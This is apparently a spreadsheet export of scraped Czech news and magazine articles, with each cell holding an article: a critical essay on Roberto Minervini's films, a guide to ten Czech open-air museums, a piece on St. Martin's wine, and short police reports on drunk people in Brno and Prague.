Donnem A. Pennebakerem . Nejdřív se věnoval fotografování, pak tvorbě vlastních dokumentů. Vykročil tak podobným směrem jako jeho strýc Gianni Minervini, který produkoval například Oscarem oceněnou tragikomedii Středozemí (1991). Zrození metody Studium médií Minervini dokončil v roce 2004, kdy mu bylo čtyřiatřicet. Vzápětí natočil syrový kraťas z newyorského podsvětí Voodoo Doll a několik zakázkových filmů, dokumentů a videoklipů. Na základě toho získal nabídku koordinovat filmové studijní programy na univerzitě v Manile. Na dva roky odletěl na Filipíny , věnoval se výuce a směřoval k akademické kariéře. Po návratu do Států se ale s manželkou přestěhoval do Houstonu v Texasu , kde začal obchodovat s nemovitostmi a zároveň poznal protagonisty svých prvních filmů. Financoval je právě z nákupu a prodeje domů a bytů. Minerviniho celovečerním debutem je antropologická road movie The Passage. Maria má terminální stadium rakoviny. S pomocí čerstvě propuštěného vězně Jacka chce najít šamana, kterého považuje za svou poslední záchranu. Nesourodý pár po cestě napříč západním Texasem potkává britského umělce Harolda, připravujícího svou první výstavu. Pro trojici postav není titulní „přechod“ pouze překonáváním určité vzdálenosti. Překračují také mez oddělující generace nebo bytí a nebytí. Zážitky z jízdy získávají rituální a spirituální rozměr. „Existuje jen přibližný narativní rámec, nikoli pevný scénář.“ Minervini si během natáčení The Passage poprvé ozkoušel metodu, kterou od té doby cizeluje a posouvá vždy na novou úroveň. Aktéři a aktérky filmu v předem připravených i náhodně zachycených scénách přehrávají scény odvozené z jejich vlastních životních zkušeností, a pronášeji věty, které si sami vymysleli. Tento organický, kolaborativní přístup vychází z „kolektivní antropologie“ francouzského dokumentaristy Jeana Rouche. Existuje jen přibližný narativní rámec, nikoli pevný scénář. Vše vzniká společně během natáčení. The Passage je zároveň prvním dílem zmíněné texaské trilogie. Všichni hrdinové těchto filmů se navzájem znají, v některých případech je pojí i příbuzenské vztahy. Měli tak dost času Minerviniho poznat a postupně ho začali brát jako takřka dalšího člena rodiny. Pohyb odnikud nikam V následujícím Odlivu ruční kamera soustředěně pozoruje dospívajícího chlapce, bezprizorně zabíjejícího čas během parného texaského léta. Jeho svobodná matka je zaneprázdněna prací a alkoholem , který se stává příčinou mnoha domácích konfliktů. Dějově minimalistický film navozuje táhlými záběry a sugestivním zvukovým designem melancholickou atmosféru nudy a odcizení. Název filmu odpovídá situaci obou ústředních postav. Když se voda vzdaluje, jsou matka a syn na chvíli v bezpečí, ale zároveň musí čelit nepořádku, který je tím odhalen. Kamera držící se v úrovni bezejmenného teenagera v dlouhých záběrech lakonicky sleduje, jak se při čekání na matčin návrat z práce poflakuje mezi zchátralými karavany a harampádím. Kolem nejsou žádní vrstevníci, s nimiž by si mohl hrát. Jen občas vytáhne z trávy hada nebo jiné zvíře. Za posbírané plechovky možná dostane pár dolarů a bude si moct něco koupit v místním supermarketu. Jeho možnosti trávení volného času se zdají být stejně omezené jako životní vyhlídky. Ačkoli je stále v pohybu – podobně jako postavy z filmů bratrů Dardennových (s nimiž Odliv sdílí střihačku Marii - Hélène Dozo ) –, nikam nesměřuje. Podobně jako v neorealistické klasice Německo v roce nula (1948) od Roberta Rosselliniho se zde svědkem zastaveného času stává dítě. Čelí světu chudoby, samoty a rozkladu, který mu jako jediné dědictví přenechali dospělí. Byť Minervini opět natáčel s neherci, pouze s přirozeným světlem a hrubým nástinem zápletky, opakující se gesta a symboly nebo rytmizace vyprávění matčinými příchody a odchody prozrazují důsledněji promyšlenou kompozici. Kruhově vystavěný film uzavírá těsné objetí matky a syna. Ze dvou odcizených těl se na okamžik stává jedno. Nejde ale o falešný happy end, jen o vyjádření víry, že láska je možná i tam, kde se vše ostatní zdá být bezvýchodné. Postup práce Také Minerviniho třetí film Zastavit bušící srdce upíná naději k mladým lidem. Sára se svými jedenácti sourozenci pečuje o zvířata na texaské kozí farmě. Její životní pouť je vytyčena Biblí. Měla by se vdát a zplodit potomky. O tradičních hodnotách, které jí vštěpují presbyteriánští rodiče, ale začne pochybovat po seznámení s nespoutaným jezdcem rodea Colbym. Rozbouřené emoce nelze podřídit svazující roli počestné dívky, do které ji tlačí její okolí. Minervini prostřednictvím několika málo postav opět skládá autentický obraz texaského venkova. Protagonisty v tomto případě znal velice dobře. Šlo o jeho sousedy. Získání důvěry sociálních herců je stěžejní podmínkou Minerviniho metody. Než začne filmovat, žije měsíce v jejich blízkosti, poslouchá jejich příběhy a promýšlí strukturu. Při samotném natáčení poté usiluje o co nejmenší zásahy do probíhajícího dění. Hned se jede naostro, žádné opakování. Pokud došlo k chybě, zůstane ve filmu. Kromě toho, že záběry uměle nedosvěcuje, nemění ani objektivy a při komunikaci se zbytkem štábu nepoužívá filmový žargon. Na uších nemá sluchátka, aby ho ostatní nevnímali jako návštěvníka z jiného světa. Často tak neslyší, co postavy říkají, a musí věřit svému instinktu. Štáb vedle něj tvoří jenom tři další lidé (kameraman, zvukař a ostřič). Hlavní je nenarušit plynulost záznamu. „Scény připomínají dlouhá souvětí oddělená tu a tam rázným střihem.“ Občasná nesrozumitelnost drmolivých dialogů, připomínajících konverzace z mumblecore filmů, je tak důsledkem nastíněného postupu práce. Podobnou syrovostí se vyznačuje i vizuální složka. Počínaje Bušícím srdcem točí Minervini filmy na digitální kameru, která mu umožňuje sledovat sociální herce kontinuálně několik desítek minut. Scény připomínají dlouhá souvětí oddělená tu a tam rázným střihem. Kamera, která nás situuje do centra každodenní existence postav, je diskrétní, ale ne vzdálená. A občas překvapí „malickovsky“ lyrickým záběrem texaské krajiny zalité sluncem nebo detailem něčí zamyšlené tváře. Proniknout na druhou stranu Pro dokudrama Druhá strana (2015) je důležité napětí, které Minervini vytváří tím, že je na jedné straně tichým, nevtíravým pozorovatelem a na straně druhé architektem, který do struktury filmu vsazuje četné vizuální metafory. První část originálně komponovaného filmu sleduje život Marka a Lisy, drogově závislého páru z Louisiany . Hádají se, berou drogy, mají spolu sex. Žádná cenzura. Závěrečná půlhodina je ale věnována fanatickým milovníkům střelných zbraní, kteří se v Texasu připravují na obranu vlasti před nejasně definovaným vnějším nepřítelem. Postavy z obou segmentů sdílejí lásku k vlasti a nenávist k Obamovi. Film opět nelze jednoznačně klasifikovat jako fikci, nebo dokument. Neherci „hrají“ verze sebe samých, participují na procesu tvorby. Minervini především vytvořil podmínky, v nichž pro ně není těžké odhalit se. A pak se dlouze a trpělivě dívá a čeká, k čemu dojde. Jednotlivé dimenze jejich životů prezentuje tak, jak se věcí dějí. Některé události jsou tradičně rekonstrukcí dřívějšího dění, jiné se neplánovaně odehrály až při natáčení. V ponoru do soukromí deklasovaných postav nám nebrání ani kontextualizující titulky nebo mimoobrazový komentář. Každý intimní detail je vystavován s provokativní otevřeností. Druhá strana podobně jako texaská trilogie činí velmi hmatatelnou nespokojenost bílé dělnické třídy, zdecimované alkoholem a chudobou, zaslepené rasismem a náboženským fanatismem. Jakkoli lze polemizovat s tím, nakolik etické je natáčení lidí pod vlivem omamných látek, bylo by zkratkovité obviňovat Minerviniho z exploatace bídy a zaostalosti. Protagonisty svých filmů nepozoruje jako kuriozity, ale naopak se do jejich světů snaží proniknout natolik, aby se i pro diváky stali někým povědomým, blízkým, nepopiratelným. Třídní boj neskončil Ve svém předposledním a nejpolitičtějším filmu Co uděláš, až svět vzplane? (2018) zvolil Minervini ještě ambicióznější strukturu, když splétá dohromady několik nesouvisejících příběhových vláken. U předchozích snímků vycházel z toho, že zná určité lidi, a teprve na základě těchto vztahů začal promýšlet obecnější téma. Tentokrát postupoval opačně, od tématu k jednotlivým lidem. Zajímala ho problematika rasových vztahů v současné Americe, zejména na jihu. Vydal se proto do Louisiany , New Orleans nebo Mississippi , aby porozuměl důvodům tamějších nepokojů a nespokojenosti. Přitom poznal své budoucí sociální herce. Jako vodítku mu ale nesloužily dopady trumpovské politiky, nýbrž hudba. New Orleans je koneckonců kolébkou jazzu a blues, klíčovým místem pro historii černošské kultury. Film klade velký důraz na hudbu a zpěv jakožto hlavní nástroje, pomocí nichž postavy vyprávějí svůj příběh a brání své tradice. Také takto čerpají sílu, když čelí nespravedlnosti a rasismu. Minerviniho skupinový portrét ale neukazuje Afroameričany coby oběti diskriminace. Vybírá si postavy odhodlaně hájící své místo ve společnosti, která na ně pohlíží jako na vetřelce. Vzorem houževnatosti by mohla být majitelka baru Judy, vášnivě bojující za záchranu svého louisianského podniku. Dvěma klukům, bratrům Ronaldovi a Titovi, pomáhá s přežitím v drsném prostředí dělnického Mississippi jejich spontánnost a kreativita. Kolektivním hrdinou jsou pak aktivisté z jižanské pobočky hnutí New Black Panther Party, pomáhající komunitě a organizující protesty proti policejnímu násilí a vraždám nevinných civilistů. Veristické pozorování sociálních herců je prokládáno poetickými (a rytmizujícími) záběry indiánských náčelníků z Mardi Gras, kteří se připravují na vystoupení v každoročním průvodu. „Vybírá si postavy odhodlaně hájící své místo ve společnosti, která na ně pohlíží jako na vetřelce.“ Minervini všechny aktéry natáčí vysoce kontrastní černobílou kamerou a z jednotlivých fragmentů skládá nepatetickou, obrazově podmanivou mozaiku černošské všednodennosti v současné Americe . Dlouhé záběry-sekvence s pohyblivým rámováním nás pomalu vtahují do prostředí, kde sociální herci žijí, až zapomínáme na přítomnost kamery. Film je formálně kontrolovaný, vyvážený, a přitom bezprostřední a naléhavý v tom, jak publikum konfrontuje s realitou marginalizovaných subjektů a zdůrazňuje morální odpovědnost americké společnosti, která kvůli fetišizaci individuálního úspěchu nevidí kolektivní trauma. Možná i proto současní američtí nezávislí filmaři málokdy věnují pozornost kolektivnímu neklidu a dávají přednost mocenskému boji jedince se systémem. Do Minerviniho tvorby se naproti tomu propisuje fakt, že vyrostl v Itálii 70. a 80. let, ve vysoce politizovaném levicovém prostředí. Ačkoli vám při sledování jeho filmů zřejmě utkví v paměti mnoho charismatických figur, ve výsledku nevypráví o problémech jednotlivců, ale tříd. Nespokojených, nevyslyšených, o to důrazněji se ale hlásících o slovo. Filmografie Roberta Minerviniho nám pomáhá líp je pochopit a navzdory veškerým odlišnostem v nich zahlédnout své bližní. Autor: at, Martin Šrajer Autoři person at person Martin Šrajer</t>
  </si>
  <si>
    <t>354</t>
  </si>
  <si>
    <t>204</t>
  </si>
  <si>
    <t>20241101_293_3243150916_7ee5029fbbf611875ab0.html</t>
  </si>
  <si>
    <t>7ee5029fbbf611875ab0</t>
  </si>
  <si>
    <t>Romantičtí svědkové venkovských tradic: 10&amp;nbsp;nejzajímavějších skanzenů v&amp;nbsp;Česku</t>
  </si>
  <si>
    <t>Romantičtí svědkové venkovských tradic: 10&amp;nbsp;nejzajímavějších skanzenů v&amp;nbsp;Česku Největší skanzen v Rožnově pod Radhoštěm je zároveň centrem Národního muzea v přírodě. Na snímku Dřevěné městečko. Rožnov pod Radhoštěm , Veselý Kopec, Strážnice a řada dalších. Seznam Zprávy připravily výběr desítky nejzajímavějších skanzenů v Česku. Každý z nich je unikátní svým příběhem, expozicí a originální atmosférou svého regionu. Článek si také můžete poslechnout v audioverzi. Skanzeny jsou speciální formou muzea pod širým nebem, které návštěvníkům nabízí autentický pohled na dřívější život. Nejsou jen památkou na minulost, ale také důležitým prostředkem pro uchování kulturní identity a tradic. V České republice je najdeme na několika místech. Díky pečlivé rekonstrukci a uchování původních staveb nabídnou návštěvníkům možnost na vlastní oči spatřit, jak dříve vypadala vesnická stavení, hospodářství i každodenní život. Každý skanzen má své specifikum a odráží kulturní dědictví určité oblasti. Tradice a historický život na venkově návštěvníkům ještě více přibližuje i řada kulturních akcí. Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Vetřelci v české krajině: 10 invazních druhů, jež ohrožují přírodu i zdraví Křišťálové lustry září v Kamenickém Šenově už tři sta let. Jak dnes vypadají? Váš nový přítel chlad: Zlepšuje zdraví i náladu. Pozvete ho domů? Roadtrip po Namibii . Dobrodružství, které musíte zažít Za husou i vínem . 10 tipů, kde si pochutnat na svatomartinských hodech 1. Skanzen Rožnov pod Radhoštěm Valašské dědiny - jedna z částí Valašského muzea v přírodě. Na úpatí Beskyd se nachází Valašské muzeum v přírodě, jehož areál je tím největším skanzenem v České republice . Tvořen je z několika desítek objektů ze čtyř celků - Dřevěné městečko, Valašská dědina, Mlýnská dolina a od roku 1995 také Pustevny. Ve výstavbě je ještě další část s názvem Kolibiska, která bude sousedit s Valašskou dědinou. Skanzen v Rožnově začal vznikat v roce 1925, zasloužili se o to členové rožnovského muzejního spolku, zejména sourozenci Alois a Bohumír Jaroňkovi. Areál se postupně rozrůstal a další historické budovy přibývají až do dnešních dní. Nejstarší částí muzea je Dřevěné městečko, veřejnosti otevřené od roku 1925, kam byly přeneseny historické domy například z rožnovského náměstí. Jedním z lákadel je i Mlýnská dolina zpřístupněná od roku 1983, kde je funkční vodou poháněný mlýn, pila, valcha, ale i hamr či lisovna oleje. Nejrozsáhlejší částí je Valašská dědina se svými sedmi desítkami budov. Otevírací doba a vstupné Dospělí zaplatí 150 Kč, studenti a senioři 120 Kč a rodinné vstupné (dva dospělí a až čtyři děti) stojí 300 Kč. Otevírací dobu jednotlivých částí areálů naleznete na webu Valašského muzea v přírodě. 2. Skanzen Veselý Kopec Skanzen Veselý Kopec. Svědky bydlení a hospodaření drobných zemědělců od poloviny 19. století do půlky 20. století se staneme na rozhraní Železných hor a Žďárských vrchů v Pardubickém kraji . Místní roubenky a stavby byly do areálu na Veselém Kopci přeneseny v druhé polovině 20. století z oblasti Českého Horácka, aby byly zachráněny před zánikem. Jen jediná z místních desítek budov stojí na původním místě - usedlost U Pilných č. p. 4. Na Veselém Kopci se koná mnoho akcí přibližujících zdejší lidovou kulturu, ať už se jedná o ukázky lidových obyčejů, řemesel nebo stravy. Otevírací doba a vstupné Prohlídka je možná individuálně, nebo s průvodcem a potrvá zhruba 90 minut. Dospělí zaplatí 160 Kč, studenti a senioři 140 Kč, cena vstupného se zvyšuje v případě konání kulturní akce. Více informací a otevírací dobu naleznete na webu skanzenu Veselý Kopec. 3. Skanzen Kouřim Stodola ze Želejova u Hořic ze 17. století. Místo shromažďující stavitelské památky z území středních, východních a severních Čech vzniklo v roce 1972 v prostředí bývalého ovocného sadu, veřejnosti bylo otevřeno o čtyři roky později. Díky své rozmanitosti tak nabízí srovnání různých regionálních typů lidové architektury z let minulých. Od roku 1992 probíhal dlouhý spor, který pozastavil změnu koncepce a rozvoje areálu, jednalo se o uplatnění restitučního nároku na většinu pozemků muzea. Po ukončení dvacetiletého sporu začala dostavba muzea a došlo k zatím finální změně jeho koncepce. V současnosti areál tvoří čtrnáct staveb. Tou nejzajímavější je rozhodně desetiboká roubená stodola z Durdic u Votic z poloviny 17. století. Jedná se nejen o nádhernou stavbu, ale i nejstarší zachovalou památku svého druhu v České republice . Většina objektů je i plně vybavena, aby ukázala bydlení a hospodářství na venkově od 18. století. Otevírací doba a vstupné Základní vstupné pro dospělého je 110 Kč, zlevněné pro děti, studenty a seniory je 50 Kč. Otevírací doba se každý měsíc lehce liší, doporučujeme se podívat na web skanzenu Kouřim . 4. Skanzen Vysoký Chlumec Skanzen se nachází v krásném prostředí v údolí potoka. Muzeum vesnických staveb středního Povltaví se nachází 35 kilometrů od Příbrami a je pobočkou Hornického muzea Příbram . Vznik skanzenu, který uchovává vesnické památky pamatující i polovinu 17. století, se datuje do roku 1998. Výstavba byla zahájena následující sezónu a o další rok později sem byl přenesen první dům, č. p. 4 původem z Obděnic. Postupně sem byly přesunuty i další stavby a skanzen začínal nabírat na objemu. Dnes ho tvoří přes dvě desítky staveb, ať už obytných, hospodářských, technických či drobných sakrálních. Jednou z nejzajímavějších je roubená polygonální stodola převezená z usedlosti č. p. 8 v Podolí u Vojkova, jejíž stavba byla dokončena v roce 2011. Pochází z roku 1662 a je jednou z nejstarších dochovaných staveb tohoto typu u nás. Otevírací doba a vstupné Základní vstupné s průvodcem stojí dospělého 100 Kč, děti, senioři a studenti zaplatí 50 Kč. Za volnou prohlídku areálu zaplatí dospělí 60 Kč, snížené vstupné pro děti, studenty a seniory je 30 Kč. Přesnou otevírací dobu naleznete na webu Hornického muzea Příbram . 5. Skanzen Chanovice Jedna ze staveb ve skanzenu Chanovice. V jihozápadní části Česka se na jih od města Kasejovice nachází expozice lidového stavitelství, která je součástí stálé expozice Vlastivědného muzea Dr. Hostaše v Klatovech . Muzeum se o založení této expozice pokoušelo už od svého vzniku na začátku 20. století, ovšem realizace se skanzen dočkal až na jeho konci. Podařilo se to v roce 1990, kdy muzeum získalo barokní stavbu panské sýpky a následně i pozemek na okraji obce Chanovice. V současnosti obsahuje expozice 13 památek objektů a zaměřuje se na architekturu Pošumaví. Návštěvníci tu naleznou například roubenou kůlnu, špýchar nebo stodolu, kopii sušárny na ovoce či dřevorubeckého sezónního srubu, stejně jako výklenkovou kapli s barokní pokladničkou. V budoucnu by se měla expozice ještě dále rozrůstat. Otevírací doba a vstupné Plné vstupné činí 80 Kč, za snížené zaplatíte 40 Kč, hromadné například pro základní nebo mateřské školy je 30 Kč na osobu. Zavřeno je v období od ledna do května a od října do prosince, mimo otevírací dobu je možné se na vstupu domluvit přes kontakty na webu Vlastivědného muzea Dr. Hostaše v Klatovech . 6. Skanzen Přerov nad Labem Obecní zvonička. Nedaleko Prahy se na okraji obce Přerov nad Labem nalézá nejstarší český skanzen. Polabské národopisné muzeum, jak zní oficiální název, začalo svou historii psát již v roce 1895. V tomto roce bylo v upravené bývalé kovárně a rychtě zřízeno regionální národopisné muzeum. Expozice je dnes součástí Polabského muzea, které tu založilo v roce 1967 skanzen, aby zachránilo polabskou lidovou architekturu. Na ploše o celkové rozloze dvou hektarů mohou návštěvníci zhlédnout necelých čtyřicet objektů, jedná se o chalupy, špýchary, stodoly, kapličku a další drobnou lidovou architekturu. Objekty mají zařízené interiéry a představují život na vesnici od poloviny 18. století. Otevírací doba a vstupné Dospělí zaplatí za návštěvu 120 Kč, snížené vstupné pro seniory, studenty a školáky do 15 let je 60 Kč. Více informací o otevírací době naleznete na webu Polabského národopisného muzea. 7. Skanzen Strážnice Část Skanzenu ve Strážnici . Na jihovýchodní Moravě se datují první snahy o vybudování národopisného muzea v přírodě na začátek 20. století. Podařilo se to ale až v roce 1973, kdy začala výstavba na okraji města Strážnice , nedaleko hranic se Slovenskem . Areál, ve kterém stojí více než 60 objektů, představuje návštěvníkům, jak se dříve žilo v horských oblastech Slovácka nebo v části Pomoraví. Od roku 1981 může veřejnost nakouknout do areálu Moravských Kopanic, Luhačovického Zálesí , Horňácka , lučního hospodářství či technických vodních staveb nebo si prohlédnout vinohradnický areál. Během celého roku se tu mimo jiné koná mnoho tematicky laděných akcí, které mají za cíl představit moravskou vesnici a život na ní na přelomu 19. a 20. století. Známý je hlavně Mezinárodní folklorní festival Strážnice, konaný vždy poslední víkend v červnu. Otevírací doba a vstupné Dospělí zaplatí plné vstupné 160 Kč, děti, studenti a senioři mají sníženou cenu 100 Kč. V dubnu je otevřeno pouze o víkendech a v období od listopadu do března je zavřeno. Konkrétní otevírací dobu a ceník naleznete na webu Skanzenu Strážnice. 8. Skanzen Doubrava Venkovská usedlost Doubrava. Místní malý skanzen se nachází jihovýchodně od Chebu v obci Doubrava. Jedná se o zachovalý hrázděný statek z roku 1751, známý i jako Rustlerův statek. Dnes je přístupný veřejnosti jako soukromé národopisné muzeum. Zhlédnout tu lze expozici původního zemědělského nářadí, nástrojů a lidového nábytku Chebska z 18., 19. a 20. století a lidová historická architektura tu na návštěvníky opravdu dýchá ze všech stran. Obec Doubrava byla založena začátkem 14. století a patří mezi typické středověké kolonizační vesnice. I proto vás tu přivítá mnoho vizuálně i historicky zajímavých usedlostí. Díky svědectví původní lidové architektury oblasti Chebska byla v obci na konci 20. století vyhlášena vesnická památková rezervace. Otevírací doba a vstupné Cena vstupného je 50 Kč pro dospělé, důchodci zaplatí 40 Kč a děti nebo studenti 30 Kč. Otevírací dobu zjistíte na webu Skanzenu Doubrava. 9. Skanzen Zubrnice Zemědělská usedlost č. p. 61. Jeden z nejmladších skanzenů u nás je umístěn v Českém středohoří v obci Zubrnice nedaleko Ústí nad Labem . V šedesátých letech minulého století probíhaly v oblasti bývalých Sudet demolice, které se nevyhnuly ani Zubrnicím. V roce 1974 se podařilo Vlastivědnému muzeu v Ústí nad Labem ochránit před demolicí kostel svaté Máří Magdalény a roubený dům č. p. 61 ze začátku 19. století, který je dnes jádrem skanzenu. Strůjcem myšlenky a podnětu k založení muzea lidové architektury byl František Ledvinka, budováno začalo být od roku 1977. První okruh byl veřejnosti otevřen v září roku 1988, o rok později následovaly další expozice. V současné době je součástí Národního muzea v přírodě, které je příspěvkovou organizací Ministerstva kultury ČR. Návštěvníci tu mohou narazit například na malý vodní mlýn, roubené, hrázděné nebo sakrální stavby. Otevírací doba a vstupné Dospělí zaplatí za vstupné 110 Kč, snížené pro studenty a seniory vyjde na 90 Kč. Přesné informace o otevírací době naleznete na webu Muzea v přírodě Zubrnice. 10. Skanzen Modrá Několik staveb v Archeoskanzenu Modrá. Archeoskanzen, nacházející se v okrese Uherské Hradiště , byl otevřen v roce 2004. Není to klasický skanzen, který by zachraňoval historické budovy, ale nově vybudovaná vesnice, napodobující život obyvatel Velké Moravy . Při vstupu do opevněného sídliště bránou se strážními věžemi na návštěvníky dýchne život lidí z 9. století a představuje tak i jednu z nejvýznamnějších etap českých dějin. Uvnitř se mohou návštěvníci podívat na repliky objektů z daného období včetně tzv. polozemnic, tedy staveb částečně zahloubených do země. Od června 2024 je zde nově otevřená Klenotnice Velké Moravy , která má podobu podzemního panteonu o průměru 20 metrů. Návštěvníci si v ní mohou prohlédnout nálezy vzácných velkomoravských šperků. Návštěvu skanzenu lze spojit se sousední expozicí života v českých sladkých vodách Živá voda, kterou doplňuje výběh s pratury. Otevírací doba a vstupné Základní vstupné na okruh Archeoskanzenu stojí 100 Kč, společně s Klenotnicí zaplatíte 300 Kč. Otevírací doba, konkrétní časy prohlídek a možnosti vstupného naleznete na webu Archeoskanzenu Modrá. Další skanzeny v České republice Mapa zmíněných skanzenů Chybí ve výběru nějaký váš oblíbený skanzen či muzeum v historickém stavení? Napište o něm do komentářů a dejte o něm vědět ostatním.</t>
  </si>
  <si>
    <t>20241101_294_3243243381_d5d759e26ef08e43b60e.html</t>
  </si>
  <si>
    <t>d5d759e26ef08e43b60e</t>
  </si>
  <si>
    <t>Svátek mladého vína se blíží: Moravský vinař radí, které Svatomartinské víno ochutnat a s čím ho párovat</t>
  </si>
  <si>
    <t>Svátek mladého vína se blíží: Moravský vinař radí, které Svatomartinské víno ochutnat a s čím ho párovat ZDROJ: Shutterstock sdílet: Jestli přijede letos Martin na bílém koni, vám zaručit nemůžeme. Kde však Martina na koni zcela jistě objevíte, jsou etikety či kapsle nebo šroubové uzávěry na hrdlech lahví. Lahví Svatomartinského vína . Ty se tradičně otvírají 11. listopadu v 11 hodin a 11 minut. Jak si vybrat to nejlepší a s čím párovat? Poradí zkušení someliéři a vinaři. Svatomartinské víno patří k listopadové tradici, která se u nás udržuje po staletí. Na začátku listopadu končívala čeledínům služba, sjednávali si u sedláků práci na další rok, a protože už byla některá vína z nové sklizně připravena ke konzumaci, okoštovali. Svatomartinským se připilo na úspěšnou sklizeň, práci čeledínů i na klidný advent. „Byl to také jediný okamžik, kdy se hospodář sešel s ‚ pracujícím lidem ‘ u jednoho stolu, upekla se husa a ochutnávalo se mladé víno ,“ řekl pro Lidovky.cz uznávaný someliér Tomáš Brůha. Označení Svatomartinské víno se ve spojení s novým vínem začalo používat v 18. století na dvoře císaře Josefa II . a používá se dodnes. Jaká vína toto označení nesou, s čím je párovat a jak se liší od francouzského Beaujolais Nouveau? ČÍST ČLÁNEK Co od Svatomartinského vína čekat? Podle prezidenta Unie enologů ČR a spolumajitele vinařství Domaine Eisgrub , Mojmíra Baroně, nelze mít od Svatomartinského vína vysoká očekávání, jde především o oslavu mladého vína . „Je to první vhled do ročníku. Vína jsou lehká, svěží a jejich kvalitu hlídá komise,“ vysvětluje. Komise naslepo posuzuje standardním stobodovým systémem vlastnosti vína , kterými jsou: vzhled (čirost a barva) vůně (intenzita, čistota, harmonie) chuť (intenzita, čistota, harmonie, perzistence) celkový dojem z vína „Nelze mluvit o velkých vínech. Ta rozhodně potřebují o mnoho víc času a to nejen při výrobě. Svatomartinská a Beaujolais jsou vína , která se ještě před pár týdny v podobě hroznů houpala na keřích a následně byla poměrně rychle připravena ke konzumaci,“ upřímně říká Tomáš Brůha pro Lidovky.cz. ČÍST ČLÁNEK Svatomartinské víno : odrůdy a párování Aby mohlo víno nést značku Svatomartinské, musí být podle Mojmíra Baroně vyrobeno z hroznů vybraných odrůd na území České republiky a projít hodnocením nezávislé komise: Bílá vína : Müller Thurgau, Veltlínské červené rané, od roku 2010 také Muškát moravský Červená a růžová vína : Modrý Portugal a Svatovavřinecké, a od roku 2013 ještě Zweigeltrebe A s jakými pokrmy Svatomartinské párovat, aby byl požitek dokonalý? „Určitě s husou, ať je svátek kompletní. Jinak se jedná o vína k běžnému stolování,“ doporučuje Mojmír Baroň. ČÍST ČLÁNEK Mladá vína : Svatomartinské a Beaujolais Nouveau Svatomartinské není jediné populární mladé víno . S francouzským Beaujolais Nouveau mají společné to, že jde o první vína aktuálního ročníku a jsou obě určena k brzké konzumaci. Rozdíly se však najdou. „Jiné odrůdy, jiná technologie, jiné uvádění na trh,“ shrnuje Mojmír Baroň. Původ: Svatomartinské víno pochází z českých a moravských vinic, Beaujolais Nouveau se vyrábí ve Francii v oblasti Beaujolais z odrůdu Gamay. Odrůdy a chuťový profil: Svatomartinské víno nabízí širokou škálu bílých, růžových a červených vín z různých odrůd, naopak Beaujolais Nouveau je červené víno z jedné odrůdy. Tradice a historie: Svatomartinské patří k pevnému datu, k 11. listopadu, a jako doplněk k slavnostnímu menu, Beaujolais Nouveau se otevírá ve Francii třetí čtvrtek v listopadu a je to velká společenská událost. Zdroj: Alkohol .cz, VínaZMoravyVínaZČech.cz, Lidovky.cz, Domaineeisgrub.com Skryt pre seznam Autor: Autor: | katerina.osick…</t>
  </si>
  <si>
    <t>20241101_295_3243159867_19b493903c959ba471b9.html</t>
  </si>
  <si>
    <t>19b493903c959ba471b9</t>
  </si>
  <si>
    <t>Opilec v Brně nadýchal 5,38 promile. Při prvním měření strážníkům nestačil alkotester</t>
  </si>
  <si>
    <t>Opilec v Brně nadýchal 5,38 promile. Při prvním měření strážníkům nestačil alkotester ČTK 1. 11. 2024 10:59 Čtyřiapadesátiletý muž v brněnských Řečkovicích nadýchal 5,38 promile, což už je dávka alkoholu , která může být smrtelná. Strážníkům při prvotním měření nestačilo ani rozpětí testeru na alkohol . Ilustrační snímek | Foto: Jakub Plíhal Hlídka strážníků přijela muže zkontrolovat do tramvajové smyčky v Řečkovicích ve čtvrtek v poledne po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně opilý. Měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. "Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile," uvedl mluvčí. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Za hranici, při které hrozí upadnutí do bezvědomí a smrt, je považována hodnota čtyř promile. Někteří lidé jsou schopni snášet alkohol výrazně lépe. Příkladem je traktorista Milan Čurda , kterého před lety zadrželi policisté za volantem fekálního vozu, když nadýchal osm promile alkoholu . V roce 2018 lékaři ošetřovali houbaře z Ostravska se zlomeným kotníkem, který měl v krvi dokonce 8,83 promile alkoholu . Za světového rekordmana je považován Polák, který po oslavě s kamarády nadýchal 12,3 promile. Zdravotníci si muže v Brně převzali do své péče a po ošetření ho odvezli do nemocnice. Je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do 20 tisíc korun. reklama Autor: ČTK Autor ČTK Rubrika transition_slide Regiony</t>
  </si>
  <si>
    <t>321740</t>
  </si>
  <si>
    <t>334830</t>
  </si>
  <si>
    <t>20241101_296_3243150706_24c69827e4c4bd7632cc.html</t>
  </si>
  <si>
    <t>24c69827e4c4bd7632cc</t>
  </si>
  <si>
    <t>Ryan Reynolds vaří pivo, A.I. rozhoduje o miliardách a Warneři vítězí i prohrávají</t>
  </si>
  <si>
    <t>20241101_297_3275803250_35e42e50032fa297c0a8.html</t>
  </si>
  <si>
    <t>35e42e50032fa297c0a8</t>
  </si>
  <si>
    <t>Jedno pivo a tolik promile</t>
  </si>
  <si>
    <t>Jedno pivo a tolik promile Dva řidiči skončili v hledáčku strážníků na Praze 12 . Oba na sebe upozornili nestandardní jízdou – jeden opakovaně popojížděl v křižovatce sem a tam, druhý vyrazil jak při startu Formule 1. Muži shodně tvrdili, že si před jízdou dali jedno pivo . Šestačtyřicetiletý muž nadýchal přes 1 promile, sedmadvacetiletý přes 1,5 promile. Autor: Jan Novák Autor person Jan Novák Rubrika transition_slide aktuality MP</t>
  </si>
  <si>
    <t>339</t>
  </si>
  <si>
    <t>432</t>
  </si>
  <si>
    <t>20241101_298_3243140482_ec08970f8b872b0adefe.html</t>
  </si>
  <si>
    <t>ec08970f8b872b0adefe</t>
  </si>
  <si>
    <t>Kalábrie: Skrytý klenot Itálie, který musíte objevit</t>
  </si>
  <si>
